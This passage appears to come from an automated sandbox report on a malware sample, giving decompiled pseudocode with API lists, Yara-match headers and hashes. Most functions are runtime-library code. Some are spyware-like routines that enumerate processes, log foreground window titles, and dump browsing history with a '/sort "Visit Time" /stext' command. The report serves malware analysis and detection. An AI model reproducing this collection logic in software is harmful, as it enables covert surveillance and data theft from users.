                              				void* _t104;
                              				void* _t107;
                              				void* _t109;
                              				void* _t111;
                              				void* _t115;
                              				char* _t116;
                              				void* _t119;
                              				signed int _t121;
                              				signed int _t128;
                              				signed int* _t129;
                              				signed int _t136;
                              				signed int _t137;
                              				char _t138;
                              				signed int _t139;
                              				signed int _t142;
                              				signed int _t146;
                              				signed int _t151;
                              				char _t156;
                              				char _t157;
                              				void* _t161;
                              				unsigned int _t162;
                              				signed int _t164;
                              				signed int _t166;
                              				signed int _t170;
                              				void* _t171;
                              				signed int* _t172;
                              				signed int _t174;
                              				signed int _t181;
                              				signed int _t182;
                              				signed int _t183;
                              				signed int _t184;
                              				signed int _t185;
                              				signed int _t186;
                              				signed int _t187;
                              
                              				_t171 = __edx;
                              				_t181 = _a24;
                              				if(_t181 < 0) {
                              					_t181 = 0;
                              				}
                              				_t184 = _a8;
                              				 *_t184 = 0;
                              				L00434E17(0,  &_v52, _t171, _a36);
                              				_t5 = _t181 + 0xb; // 0xb
                              				if(_a12 > _t5) {
                              					_t172 = _a4;
                              					_t142 = _t172[1];
                              					_v36 =  *_t172;
                              					__eflags = (_t142 >> 0x00000014 & 0x000007ff) - 0x7ff;
                              					if((_t142 >> 0x00000014 & 0x000007ff) != 0x7ff) {
                              						L11:
                              						__eflags = _t142 & 0x80000000;
                              						if((_t142 & 0x80000000) != 0) {
                              							 *_t184 = 0x2d;
                              							_t184 = _t184 + 1;
                              							__eflags = _t184;
                              						}
                              						__eflags = _a28;
                              						_v16 = 0x3ff;
                              						_t136 = ((0 | _a28 == 0x00000000) - 0x00000001 & 0xffffffe0) + 0x27;
                              						__eflags = _t172[1] & 0x7ff00000;
                              						_v32 = _t136;
                              						_t86 = 0x30;
                              						if((_t172[1] & 0x7ff00000) != 0) {
                              							 *_t184 = 0x31;
                              							_t185 = _t184 + 1;
                              							__eflags = _t185;
                              						} else {
                              							 *_t184 = _t86;
                              							_t185 = _t184 + 1;
                              							_t164 =  *_t172 | _t172[1] & 0x000fffff;
                              							__eflags = _t164;
                              							if(_t164 != 0) {
                              								_v16 = 0x3fe;
                              							} else {
                              								_v16 = _v16 & _t164;
                              							}
                              						}
                              						_t146 = _t185;
                              						_t186 = _t185 + 1;
                              						_v28 = _t146;
                              						__eflags = _t181;
                              						if(_t181 != 0) {
                              							_t30 = _v48 + 0x88; // 0x74000000
                              							 *_t146 =  *((intOrPtr*)( *((intOrPtr*)( *_t30))));
                              						} else {
                              							 *_t146 = 0;
                              						}
                              						_t92 = _t172[1] & 0x000fffff;
                              						__eflags = _t92;
                              						_v20 = _t92;
                              						if(_t92 > 0) {
                              							L23:
                              							_t33 =  &_v8;
                              							 *_t33 = _v8 & 0x00000000;
                              							__eflags =  *_t33;
                              							_t147 = 0xf0000;
                              							_t93 = 0x30;
                              							_v12 = _t93;
                              							_v20 = 0xf0000;
                              							do {
                              								__eflags = _t181;
                              								if(_t181 <= 0) {
                              									break;
                              								}
                              								_t119 = E00450650( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
                              								_t161 = 0x30;
                              								_t121 = _t119 + _t161 & 0x0000ffff;
                              								__eflags = _t121 - 0x39;
                              								if(_t121 > 0x39) {
                              									_t121 = _t121 + _t136;
                              									__eflags = _t121;
                              								}
                              								_t162 = _v20;
                              								_t172 = _a4;
                              								 *_t186 = _t121;
                              								_t186 = _t186 + 1;
                              								_v8 = (_t162 << 0x00000020 | _v8) >> 4;
                              								_t147 = _t162 >> 4;
                              								_t93 = _v12 - 4;
                              								_t181 = _t181 - 1;
                              								_v20 = _t162 >> 4;
                              								_v12 = _t93;
                              								__eflags = _t93;
                              							} while (_t93 >= 0);
                              							__eflags = _t93;
                              							if(_t93 < 0) {
                              								goto L39;
                              							}
                              							_t115 = E00450650( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
                              							__eflags = _t115 - 8;
                              							if(_t115 <= 8) {
                              								goto L39;
                              							}
                              							_t54 = _t186 - 1; // 0xff8bc35f
                              							_t116 = _t54;
                              							_t138 = 0x30;
                              							while(1) {
                              								_t156 =  *_t116;
                              								__eflags = _t156 - 0x66;
                              								if(_t156 == 0x66) {
                              									goto L33;
                              								}
                              								__eflags = _t156 - 0x46;
                              								if(_t156 != 0x46) {
                              									_t139 = _v32;
                              									__eflags = _t116 - _v28;
                              									if(_t116 == _v28) {
                              										_t57 = _t116 - 1;
                              										 *_t57 =  *(_t116 - 1) + 1;
                              										__eflags =  *_t57;
                              									} else {
                              										_t157 =  *_t116;
                              										__eflags = _t157 - 0x39;
                              										if(_t157 != 0x39) {
                              											 *_t116 = _t157 + 1;
                              										} else {
                              											 *_t116 = _t139 + 0x3a;
                              										}
                              									}
                              									goto L39;
                              								}
                              								L33:
                              								 *_t116 = _t138;
                              								_t116 = _t116 - 1;
                              							}
                              						} else {
                              							__eflags =  *_t172;
                              							if( *_t172 <= 0) {
                              								L39:
                              								__eflags = _t181;
                              								if(_t181 > 0) {
                              									_push(_t181);
                              									_t111 = 0x30;
                              									_push(_t111);
                              									_push(_t186);
                              									E00431810(_t181);
                              									_t186 = _t186 + _t181;
                              									__eflags = _t186;
                              								}
                              								_t94 = _v28;
                              								__eflags =  *_t94;
                              								if( *_t94 == 0) {
                              									_t186 = _t94;
                              								}
                              								__eflags = _a28;
                              								 *_t186 = ((_t94 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
                              								_t174 = _a4[1];
                              								_t100 = E00450650( *_a4, 0x34, _t174);
                              								_t137 = 0;
                              								_t151 = (_t100 & 0x000007ff) - _v16;
                              								__eflags = _t151;
                              								asm("sbb ebx, ebx");
                              								if(__eflags < 0) {
                              									L47:
                              									 *(_t186 + 1) = 0x2d;
                              									_t187 = _t186 + 2;
                              									__eflags = _t187;
                              									_t151 =  ~_t151;
                              									asm("adc ebx, 0x0");
                              									_t137 =  ~_t137;
                              									goto L48;
                              								} else {
                              									if(__eflags > 0) {
                              										L46:
                              										 *(_t186 + 1) = 0x2b;
                              										_t187 = _t186 + 2;
                              										L48:
                              										_t182 = _t187;
                              										_t101 = 0x30;
                              										 *_t187 = _t101;
                              										__eflags = _t137;
                              										if(__eflags < 0) {
                              											L56:
                              											__eflags = _t187 - _t182;
                              											if(_t187 != _t182) {
                              												L60:
                              												_push(0);
                              												_push(0xa);
                              												_push(_t137);
                              												_push(_t151);
                              												_t102 = E00450350();
                              												_v32 = _t174;
                              												 *_t187 = _t102 + 0x30;
                              												_t187 = _t187 + 1;
                              												__eflags = _t187;
                              												L61:
                              												_t104 = 0x30;
                              												_t183 = 0;
                              												__eflags = 0;
                              												 *_t187 = _t151 + _t104;
                              												 *(_t187 + 1) = 0;
                              												goto L62;
                              											}
                              											__eflags = _t137;
                              											if(__eflags < 0) {
                              												goto L61;
                              											}
                              											if(__eflags > 0) {
                              												goto L60;
                              											}
                              											__eflags = _t151 - 0xa;
                              											if(_t151 < 0xa) {
                              												goto L61;
                              											}
                              											goto L60;
                              										}
                              										if(__eflags > 0) {
                              											L51:
                              											_push(0);
                              											_push(0x3e8);
                              											_push(_t137);
                              											_push(_t151);
                              											_t107 = E00450350();
                              											_v32 = _t174;
                              											 *_t187 = _t107 + 0x30;
                              											_t187 = _t187 + 1;
                              											__eflags = _t187 - _t182;
                              											if(_t187 != _t182) {
                              												L55:
                              												_push(0);
                              												_push(0x64);
                              												_push(_t137);
                              												_push(_t151);
                              												_t109 = E00450350();
                              												_v32 = _t174;
                              												 *_t187 = _t109 + 0x30;
                              												_t187 = _t187 + 1;
                              												__eflags = _t187;
                              												goto L56;
                              											}
                              											L52:
                              											__eflags = _t137;
                              											if(__eflags < 0) {
                              												goto L56;
                              											}
                              											if(__eflags > 0) {
                              												goto L55;
                              											}
                              											__eflags = _t151 - 0x64;
                              											if(_t151 < 0x64) {
                              												goto L56;
                              											}
                              											goto L55;
                              										}
                              										__eflags = _t151 - 0x3e8;
                              										if(_t151 < 0x3e8) {
                              											goto L52;
                              										}
                              										goto L51;
                              									}
                              									__eflags = _t151;
                              									if(_t151 < 0) {
                              										goto L47;
                              									}
                              									goto L46;
                              								}
                              							}
                              							goto L23;
                              						}
                              					}
                              					__eflags = 0;
                              					if(0 != 0) {
                              						goto L11;
                              					} else {
                              						_t183 = E00442793(0, _t142, 0, _t172, _t184, _a12, _a16, _a20, _t181, 0, _a32, 0);
                              						__eflags = _t183;
                              						if(_t183 == 0) {
                              							_t128 = E00450730(_t184, 0x65);
                              							_pop(_t166);
                              							__eflags = _t128;
                              							if(_t128 != 0) {
                              								__eflags = _a28;
                              								_t170 = ((_t166 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
                              								__eflags = _t170;
                              								 *_t128 = _t170;
                              								 *((char*)(_t128 + 3)) = 0;
                              							}
                              							_t183 = 0;
                              						} else {
                              							 *_t184 = 0;
                              						}
                              						goto L62;
                              					}
                              				} else {
                              					_t129 = L00439E14();
                              					_t183 = 0x22;
                              					 *_t129 = _t183;
                              					E0043626D();
                              					L62:
                              					if(_v40 != 0) {
                              						 *(_v52 + 0x350) =  *(_v52 + 0x350) & 0xfffffffd;
                              					}
                              					return _t183;
                              				}
                              			}

                              APIs
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: __alldvrm$_strrchr
                              • String ID:
                              • API String ID: 1036877536-0
                              • Opcode ID: 23a1a2d90236b02b2083a87cd05f4a9d3c3254100ec0a3a0d8469f59a596ace0
                              • Instruction ID: 63a792aad3bfe3cbde7ecdf4ead5abea7afdf704ef8a669ef2216d63f232220a
                              • Opcode Fuzzy Hash: 23a1a2d90236b02b2083a87cd05f4a9d3c3254100ec0a3a0d8469f59a596ace0
                              • Instruction Fuzzy Hash: C0A158719003869FFB118F28C9917AEBBA4EF55310F5541AFF4859B382C6BC9D41C758
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 95%
                              			E0043B0B1(void* _a4, intOrPtr* _a8) {
                              				char _v5;
                              				intOrPtr _v12;
                              				char _v16;
                              				signed int _t44;
                              				char _t47;
                              				intOrPtr _t50;
                              				signed int _t52;
                              				signed int _t56;
                              				signed int _t57;
                              				void* _t59;
                              				signed int _t63;
                              				signed int _t65;
                              				char _t67;
                              				intOrPtr* _t68;
                              				intOrPtr* _t69;
                              				intOrPtr* _t71;
                              				intOrPtr _t75;
                              				void* _t76;
                              				void* _t77;
                              				signed int _t80;
                              				intOrPtr _t82;
                              				void* _t86;
                              				signed int _t87;
                              				void* _t89;
                              				signed int _t91;
                              				intOrPtr* _t98;
                              				void* _t101;
                              				intOrPtr _t102;
                              				intOrPtr _t103;
                              
                              				_t101 = _a4;
                              				if(_t101 != 0) {
                              					_t80 = 9;
                              					memset(_t101, _t44 | 0xffffffff, _t80 << 2);
                              					_t98 = _a8;
                              					__eflags = _t98;
                              					if(_t98 != 0) {
                              						_t82 =  *((intOrPtr*)(_t98 + 4));
                              						_t47 =  *_t98;
                              						_v16 = _t47;
                              						_v12 = _t82;
                              						__eflags = _t82 - 0xffffffff;
                              						if(__eflags > 0) {
                              							L7:
                              							_t89 = 7;
                              							__eflags = _t82 - _t89;
                              							if(__eflags < 0) {
                              								L12:
                              								_v5 = 0;
                              								_t50 = E0043B1FE(_t82, __eflags,  &_v16,  &_v5);
                              								_t75 = _v16;
                              								 *((intOrPtr*)(_t101 + 0x14)) = _t50;
                              								_t52 = E00450430(_t75, _v12, 0x15180, 0);
                              								 *(_t101 + 0x1c) = _t52;
                              								_t86 = 0x4591c8;
                              								_t76 = _t75 - _t52 * 0x15180;
                              								asm("sbb eax, edx");
                              								__eflags = _v5;
                              								if(_v5 == 0) {
                              									_t86 = 0x459194;
                              								}
                              								_t91 =  *(_t101 + 0x1c);
                              								_t56 = 1;
                              								__eflags =  *((intOrPtr*)(_t86 + 4)) - _t91;
                              								if( *((intOrPtr*)(_t86 + 4)) >= _t91) {
                              									L16:
                              									_t57 = _t56 - 1;
                              									 *(_t101 + 0x10) = _t57;
                              									 *((intOrPtr*)(_t101 + 0xc)) = _t91 -  *((intOrPtr*)(_t86 + _t57 * 4));
                              									_t59 = E00450430( *_t98,  *((intOrPtr*)(_t98 + 4)), 0x15180, 0);
                              									_t87 = 7;
                              									asm("cdq");
                              									 *(_t101 + 0x18) = (_t59 + 4) % _t87;
                              									_t63 = E00450430(_t76, _v12, 0xe10, 0);
                              									 *(_t101 + 8) = _t63;
                              									_t77 = _t76 - _t63 * 0xe10;
                              									asm("sbb edi, edx");
                              									_t65 = E00450430(_t77, _v12, 0x3c, 0);
                              									 *(_t101 + 0x20) =  *(_t101 + 0x20) & 0x00000000;
                              									 *(_t101 + 4) = _t65;
                              									_t67 = 0;
                              									__eflags = 0;
                              									 *_t101 = _t77 - _t65 * 0x3c;
                              									L17:
                              									return _t67;
                              								} else {
                              									do {
                              										_t56 = _t56 + 1;
                              										__eflags =  *((intOrPtr*)(_t86 + _t56 * 4)) - _t91;
                              									} while ( *((intOrPtr*)(_t86 + _t56 * 4)) < _t91);
                              									goto L16;
                              								}
                              							}
                              							if(__eflags > 0) {
                              								L10:
                              								_t68 = L00439E14();
                              								_t102 = 0x16;
                              								 *_t68 = _t102;
                              								L11:
                              								_t67 = _t102;
                              								goto L17;
                              							}
                              							__eflags = _t47 - 0x934126cf;
                              							if(__eflags <= 0) {
                              								goto L12;
                              							}
                              							goto L10;
                              						}
                              						if(__eflags < 0) {
                              							goto L10;
                              						}
                              						__eflags = _t47 - 0xffff5740;
                              						if(_t47 < 0xffff5740) {
                              							goto L10;
                              						}
                              						goto L7;
                              					}
                              					_t69 = L00439E14();
                              					_t102 = 0x16;
                              					 *_t69 = _t102;
                              					E0043626D();
                              					goto L11;
                              				}
                              				_t71 = L00439E14();
                              				_t103 = 0x16;
                              				 *_t71 = _t103;
                              				E0043626D();
                              				return _t103;
                              			}

                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 4ca7261ae704e926ef2e87033f740578fb49095d9bc2293d227a698108ee9142
                              • Instruction ID: fabbc6a6f7032cda4dd40e8c936e700ba33ba9abdb81f3509140ce19fd5ad8dd
                              • Opcode Fuzzy Hash: 4ca7261ae704e926ef2e87033f740578fb49095d9bc2293d227a698108ee9142
                              • Instruction Fuzzy Hash: 08410672A00304AFDB249F39CC51BAB7BA9EB8C714F10962FF211DB281D779994187C4
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E0040D5B1(void* __ebx, void* __ecx, void* __eflags) {
                              				char _v28;
                              				char _v52;
                              				char _v76;
                              				char _v100;
                              				char _v124;
                              				char _v148;
                              				char _v172;
                              				char _v196;
                              				char _v220;
                              				char _v244;
                              				char _v268;
                              				char _v292;
                              				char _v316;
                              				char _v340;
                              				char _v864;
                              				intOrPtr _v892;
                              				void* _v900;
                              				void* __edi;
                              				void* __esi;
                              				void* _t47;
                              				void* _t48;
                              				void* _t50;
                              				void* _t129;
                              				void* _t130;
                              
                              				_t77 = __ecx;
                              				_t76 = __ebx;
                              				_t129 = __ecx;
                              				E004020B5(__ebx, __ecx);
                              				 *0x46beb4 = L00416F6C(_t77);
                              				_t130 = CreateToolhelp32Snapshot(2, 0);
                              				if(_t130 != 0) {
                              					_v900 = 0x22c;
                              					Process32FirstW(_t130,  &_v900);
                              					while(Process32NextW(_t130,  &_v900) != 0) {
                              						E0040425F(_t76,  &_v28,  &_v864);
                              						_t47 = L00416B7E(_t76,  &_v340, L00416F9A(_v892) & 0x000000ff);
                              						_t48 = L00416B7E(_t76,  &_v316, _v892);
                              						_t50 = L00416CF4(_t76,  &_v268, L00416FD0( &_v292, _v892));
                              						L00401FB1(_t129, _t58, _t130, E0040530D(_t76,  &_v52, L00402EFD( &_v76, E0040530D(_t76,  &_v100, L00402EFD( &_v124, E0040530D(_t76,  &_v148, L00402EFD( &_v172, E0040530D(_t76,  &_v196, E004074F2(_t76,  &_v220, _t129, __eflags, L00416CF4(_t76,  &_v244,  &_v28)), _t129, __eflags, 0x460634), _t50), _t129, __eflags, 0x460634), _t48), _t129, __eflags, 0x460634), _t47), _t129, __eflags, "|"));
                              						L00401FA7();
                              						L00401FA7();
                              						L00401FA7();
                              						L00401FA7();
                              						L00401FA7();
                              						L00401FA7();
                              						L00401FA7();
                              						L00401FA7();
                              						L00401FA7();
                              						L00401FA7();
                              						L00401ED0();
                              						L00401FA7();
                              						L00401FA7();
                              						L00401ED0();
                              					}
                              					CloseHandle(_t130);
                              				}
                              				return _t129;
                              			}

                              APIs
                                • Part of subcall function 00416F6C: GetCurrentProcess.KERNEL32(?,?,?,00417A29,WinDir,00000000,00000000), ref: 00416F7D
                              • CreateToolhelp32Snapshot.KERNEL32 ref: 0040D5D1
                              • Process32FirstW.KERNEL32(00000000,?), ref: 0040D5F3
                              • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040D77A
                              • CloseHandle.KERNEL32(00000000), ref: 0040D789
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: Process32$CloseCreateCurrentFirstHandleNextProcessSnapshotToolhelp32
                              • String ID:
                              • API String ID: 592884611-0
                              • Opcode ID: 716ab2d06d8a60fa4db77e097107724ca002d183ef2603b9f039fcd80d9d1449
                              • Instruction ID: d2b0c1bf7218dab9c36398846b3bef5936211f0d8f53bb00f93021c478d55916
                              • Opcode Fuzzy Hash: 716ab2d06d8a60fa4db77e097107724ca002d183ef2603b9f039fcd80d9d1449
                              • Instruction Fuzzy Hash: 00414071A002195AC719FB61DC51EEEB375AF50304F5041BFB409A71E2EF786E8ACE88
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 89%
                              			E00408A53() {
                              				char _v2004;
                              				char _v2012;
                              				char _v2028;
                              				void* _v2036;
                              				char _v2056;
                              				void* _v2060;
                              				char _v2080;
                              				void* _v2084;
                              				void* _t15;
                              				signed int _t17;
                              				void* _t30;
                              				void* _t32;
                              				void* _t34;
                              				void* _t35;
                              				void* _t59;
                              				void* _t61;
                              				signed int _t62;
                              				signed int _t63;
                              				void* _t64;
                              				void* _t65;
                              				void* _t66;
                              				void* _t67;
                              				void* _t68;
                              
                              				_t63 = _t62 & 0xfffffff8;
                              				_t69 = _t63;
                              				_t64 = _t63 - 0x81c;
                              				_push(_t34);
                              				_t59 = Sleep;
                              				_t61 = _t35;
                              				while(1) {
                              					E00431810(_t59,  &_v2004, 0, 0x7d0);
                              					_t65 = _t64 + 0xc;
                              					while(1) {
                              						_t15 = L00401F75(L00401E29(0x46c578, _t56, _t69, 0x2a));
                              						_t66 = _t65 - 0x18;
                              						E0040425F(_t34, _t66, _t15);
                              						_t17 = E00417417( &_v2012, _t56);
                              						_t65 = _t66 + 0x18;
                              						_t69 = _t17;
                              						if(_t17 != 0) {
                              							break;
                              						}
                              						Sleep(0x1f4);
                              					}
                              					_t56 = E004043E5(_t34,  &_v2056, L"\r\n[ ", __eflags, E0040425F(_t34,  &_v2028,  &_v2004));
                              					L00401EDA(_t61 + 4, _t20, _t61, E00403086(_t34,  &_v2080, _t20, _t59, __eflags, L" ]\r\n"));
                              					L00401ED0();
                              					L00401ED0();
                              					L00401ED0();
                              					_t67 = _t65 - 0x18;
                              					E00407352(_t34, _t67, _t56, __eflags, _t61 + 0x60);
                              					E00408744(_t61);
                              					while(1) {
                              						_t30 = L00401F75(L00401E29(0x46c578, _t56, __eflags, 0x2a));
                              						_t68 = _t67 - 0x18;
                              						E0040425F(_t34, _t68, _t30);
                              						_t32 = E00417417(0, _t56);
                              						_t64 = _t68 + 0x18;
                              						__eflags = _t32;
                              						if(__eflags == 0) {
                              							break;
                              						}
                              						Sleep(0x64);
                              					}
                              					E004095AB(_t34, _t61);
                              				}
                              			}

                              APIs
                                • Part of subcall function 00417417: GetForegroundWindow.USER32(73B76490,?), ref: 00417427
                                • Part of subcall function 00417417: GetWindowTextLengthW.USER32(00000000), ref: 00417430
                                • Part of subcall function 00417417: GetWindowTextW.USER32 ref: 0041745A
                              • Sleep.KERNEL32(000001F4), ref: 00408AB1
                              • Sleep.KERNEL32(00000064), ref: 00408B4B
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: Window$SleepText$ForegroundLength
                              • String ID: [ $ ]
                              • API String ID: 3309952895-93608704
                              • Opcode ID: a1bf6640d8231aa274d9fe40541848d5a6ba70444c51f545770990fb7b3e391b
                              • Instruction ID: cca0d05e2164998ef68a958f21fdddd47f0264d2a0f8426d28c401fd19228762
                              • Opcode Fuzzy Hash: a1bf6640d8231aa274d9fe40541848d5a6ba70444c51f545770990fb7b3e391b
                              • Instruction Fuzzy Hash: 5721CFB1A0420067C604F676DD17A6E72699F80748F40043FF982772E3EE3DAA09869F
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 83%
                              			E00417334(WCHAR* __ecx, intOrPtr __edx) {
                              				intOrPtr _v8;
                              				long _v12;
                              				void* __ebx;
                              				void* __edi;
                              				struct _OVERLAPPED* _t13;
                              				struct _OVERLAPPED* _t15;
                              				void* _t22;
                              				long _t25;
                              
                              				_push(__ecx);
                              				_push(__ecx);
                              				_t15 = 0;
                              				_v8 = __edx;
                              				_t22 = CreateFileW(__ecx, 0x80000000, 3, 0, 3, 0x80, 0);
                              				if(_t22 != 0xffffffff) {
                              					_t25 = GetFileSize(_t22, 0);
                              					E00402439(0, _v8, _t22, _t25, 0);
                              					_v12 = 0;
                              					if(ReadFile(_t22, L00401F75(_v8), _t25,  &_v12, 0) != 0) {
                              						_t15 = 1;
                              					}
                              					CloseHandle(_t22);
                              					_t13 = _t15;
                              				} else {
                              					_t13 = 0;
                              				}
                              				return _t13;
                              			}

                              APIs
                              • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,00000000,00000000,?,00404210,0045F454), ref: 00417351
                              • GetFileSize.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?,00404210,0045F454), ref: 00417365
                              • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000,00000000,?,00404210,0045F454), ref: 0041738A
                              • CloseHandle.KERNEL32(00000000,00000000,00000000,?,00404210,0045F454), ref: 00417398
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: File$CloseCreateHandleReadSize
                              • String ID:
                              • API String ID: 3919263394-0
                              • Opcode ID: 3ffb256bfb62a0ac902b2c1c797c7c06f6ce1e0d8605f8ffe047bc3b227f72d2
                              • Instruction ID: 56c905e826b57cd088f8bccfe3f058dde1bc79989e28d4bbb664d7596ff6dfd6
                              • Opcode Fuzzy Hash: 3ffb256bfb62a0ac902b2c1c797c7c06f6ce1e0d8605f8ffe047bc3b227f72d2
                              • Instruction Fuzzy Hash: 8C01D671501218BFE7105F61AC89EFF777CEB45799F10016AFC04A3281D6749E019634
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E00431611() {
                              				void* _t4;
                              				void* _t8;
                              
                              				E00434851();
                              				E004315A5();
                              				if(L00434AA5() != 0) {
                              					_t4 = E00434A57(_t8, __eflags);
                              					__eflags = _t4;
                              					if(_t4 != 0) {
                              						return 1;
                              					} else {
                              						L00434AE1();
                              						goto L1;
                              					}
                              				} else {
                              					L1:
                              					return 0;
                              				}
                              			}

                              APIs
                              • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00431611
                              • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00431616
                              • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 0043161B
                                • Part of subcall function 00434AA5: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 00434AB6
                              • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00431630
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                              • String ID:
                              • API String ID: 1761009282-0
                              • Opcode ID: 189a8e90e542afe2bfd3c914dbb3a980279d05a3d78919d3eec1123e7ddccfc2
                              • Instruction ID: 5bd34e3a9dce145a3b421456380c81e9cc1b8235ab00a0158aa2437511a3e12d
                              • Opcode Fuzzy Hash: 189a8e90e542afe2bfd3c914dbb3a980279d05a3d78919d3eec1123e7ddccfc2
                              • Instruction Fuzzy Hash: 59C04C58484180162C543AF222035EE13602CFF39DF9534CFA8A117523890E640B683F
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 90%
                              			E0040412D(void* __ebx) {
                              				char _v28;
                              				char _v52;
                              				char _v76;
                              				char _v100;
                              				char _v124;
                              				char _v148;
                              				char _v172;
                              				short _v692;
                              				void* __edi;
                              				WCHAR* _t40;
                              				struct HINSTANCE__* _t81;
                              				struct HINSTANCE__* _t84;
                              				void* _t85;
                              
                              				_t48 = __ebx;
                              				_t81 = 0;
                              				GetModuleFileNameW(0,  &_v692, 0x104);
                              				E004020B5(__ebx,  &_v52);
                              				E00417967( &_v28, 0x30, L00401F75(E004169EB( &_v76)));
                              				L00401FA7();
                              				L00401F75(0x46c1a0);
                              				L00413CCA(L00401ECB(E00403086(_t48,  &_v100, E00404409(_t48,  &_v124, E004043E5(_t48,  &_v148,  &_v692, 0, E0040425F(__ebx,  &_v172, L" /sort \"Visit Time\" /stext \"")), 0,  &_v28), 0, 0, "\"")));
                              				L00401ED0();
                              				L00401ED0();
                              				L00401ED0();
                              				L00401ED0();
                              				_t84 = 0;
                              				while(1) {
                              					_t40 = L00401ECB( &_v28);
                              					_t80 =  &_v52;
                              					if(E00417334(_t40,  &_v52) != 0) {
                              						break;
                              					}
                              					Sleep(0xfa);
                              					_t84 =  &(_t84->i);
                              					if(_t84 < 0x14) {
                              						continue;
                              					} else {
                              					}
                              					L5:
                              					L00401ED0();
                              					L00401FA7();
                              					return _t81;
                              				}
                              				E004020CC(_t48, _t85 - 0x18,  &_v52, __eflags,  &_v52);
                              				_push(0x9d);
                              				L00404A6E(_t48, 0x46c138, _t80, __eflags);
                              				_t81 = 1;
                              				__eflags = 1;
                              				goto L5;
                              			}

                              APIs
                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404147
                                • Part of subcall function 004169EB: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040415D), ref: 00416A12
                                • Part of subcall function 00413CCA: CloseHandle.KERNEL32(004041D6,?,004041D6,0045F454), ref: 00413CE0
                                • Part of subcall function 00413CCA: CloseHandle.KERNEL32(0045F454,?,004041D6,0045F454), ref: 00413CE9
                                • Part of subcall function 00417334: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,00000000,00000000,?,00404210,0045F454), ref: 00417351
                              • Sleep.KERNEL32(000000FA,0045F454), ref: 00404219
                              Strings
                              • /sort "Visit Time" /stext ", xrefs: 00404193
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                              • String ID: /sort "Visit Time" /stext "
                              • API String ID: 368326130-1573945896
                              • Opcode ID: 4035527b6a06ba8322556ec4bf730b267a5f89deb7f1e16ed7a21f7ae8ceee55
                              • Instruction ID: 077a0f2c23c77d26b68de5e3cb7190eb75c300570ed309256026d755c7120731
                              • Opcode Fuzzy Hash: 4035527b6a06ba8322556ec4bf730b267a5f89deb7f1e16ed7a21f7ae8ceee55
                              • Instruction Fuzzy Hash: 5A318471A1021857CB14FBB6DC969EE7775AF90309F00007FB506B71E2EF381A4ACA99
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 93%
                              			E00448967(void* __ecx, signed int _a4, intOrPtr _a8) {
                              				int _v8;
                              				void* __esi;
                              				int _t15;
                              				int _t16;
                              				signed int _t17;
                              				signed int _t23;
                              				signed int _t25;
                              				signed int _t26;
                              				signed int _t27;
                              				void* _t30;
                              				void* _t31;
                              				intOrPtr _t32;
                              				intOrPtr _t33;
                              				intOrPtr* _t34;
                              				intOrPtr* _t36;
                              
                              				_push(__ecx);
                              				_t23 = _a4;
                              				_push(_t34);
                              				if(_t23 == 0) {
                              					L21:
                              					_t15 = E00441069(_t23, _t34, __eflags, _a8 + 0x250, 0x20001004,  &_v8, 2);
                              					__eflags = _t15;
                              					if(_t15 != 0) {
                              						_t16 = _v8;
